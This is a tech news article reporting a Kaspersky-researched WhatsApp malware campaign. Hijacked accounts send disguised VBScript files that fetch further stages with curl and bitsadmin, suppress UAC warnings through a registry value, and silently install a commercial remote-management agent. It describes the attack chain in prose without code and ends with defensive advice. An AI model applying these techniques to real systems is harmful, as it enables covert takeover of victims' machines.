A global WhatsApp malware campaign hijacks trusted accounts to distribute malicious VBScripts disguised as business documents, installing rogue RMM tools.
A highly opportunistic cyberespionage and crimeware campaign has begun aggressively exploiting interpersonal trust on consumer messaging platforms. Security researchers at Kaspersky’s Global Research and Analysis Team (GReAT) have uncovered an active, multi-stage malware pipeline actively spreading through WhatsApp Web and WhatsApp Desktop clients.
The threat actors are compromising legitimate WhatsApp accounts and using them to broadcast heavily obfuscated Visual Basic Script (.vbs) attachments directly to the victims’ contact lists. Because the messages originate from a known, trusted coworker or friend, recipients are significantly more likely to bypass traditional security caution. According to investigative tracking, the final payload secretly drops enterprise-grade Remote Monitoring and Management (RMM) software, handing attackers complete, unmonitored administrative access to infected Windows systems.
See Also:https://www.techregard.com/fake-ai-agent-skill-bypasses-top-scanners-to-hijack-26000-ecosystems/
The Illusion of Administrative Cleanliness
The campaign depends on social engineering tailored for corporate environments. The malicious VBScript attachments are masked with urgent, localized financial titles such as Financial Reports.vbs, Account Statement.vbs, Outstanding Payment List.vbs, and Debt confirmation.vbs.
To maximize its international surface area, the group has localized these filenames into several languages, including Portuguese, French, German, and Malay. Telemetry indicates a highly distributed geographic footprint spanning Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, and Vietnam, with approximately 80% of current infections concentrated heavily in Malaysia.
The underlying script files are thoroughly packed with junk code and randomized variable definitions to break automated security scanners. Intriguingly, the script bodies also feature extensive comments and metadata explicitly written in simplified Chinese that mimic legitimate Microsoft Windows Update modules, detailing fake certificate validations and deployment logs.
Mechanics of the Windows Script Host Exploit
When a user opens the attachment on a Windows machine, the infection behaves differently depending on how they accessed WhatsApp:
-
WhatsApp Web: The attack relies on the user downloading the asset to their local disk and manually launching it from their browser history or downloads folder.
-
WhatsApp Desktop: The malware triggers directly inside the native application layer. Forensic process trees show that it
WhatsApp.Root.exedirectly spawnsWScript.exe(the Windows Script Host utility) to kick off the threat sequence.
Once activated, the initial VBScript constructs a hidden working directory under C:\Users\Public\Documents\ and silently invokes native Windows utilities—like curl.exe and bitsadmin.exe—to fetch secondary payloads from external infrastructure.
The secondary stage deploys two parallel scripts. The first script targets system defenses by executing a looping registry modification aimed at the ConsentPromptBehaviorAdmin value. This effectively silences Windows User Account Control (UAC) warnings, allowing the second script to silently extract a ZIP archive. This archive contains a fully configured installation package for Zoho’s ManageEngine Endpoint Central (UEMSAgent.msi). Utilizing the native msiexec.exe engine, the malware silently provisions the management agent, instantly turning the machine into a slave terminal for the attackers.
Strategic Overlaps and Defenses
While the attack chain heavily mimics behaviors observed in an earlier spring wave, the shift to deploying legitimate, commercial RMM tools represents a calculated effort to blend directly into standard corporate network traffic.
Definitely attributing the threat remains difficult. Although the simplified Chinese annotations within the code suggest a Chinese-speaking operator, Kaspersky researchers emphasize that the operational infrastructure directly overlaps with IP addresses (202.61.160[.]201Historically mapped to ValleyRAT and Gh0st RAT activity.
To safeguard corporate endpoints from this messaging threat vector, security teams are urged to enforce strict application control policies. Enterprise networks should block or tightly monitor the execution of script hosts like wscript.exe and cscript.exe within public or untrusted user profiles, while mandating that any unexpected file transfer received over external channels be verified through a secondary medium before execution.
About the Author
Jennifer Sakmufuwo Baba is a tech analyst and writer covering artificial intelligence, fintech, and emerging technologies at TechRegard. Based in Nigeria, she's passionate about translating complex tech developments into compelling, accessible stories for diverse audiences. Her work focuses on how technology shapes innovation across Africa and globally.
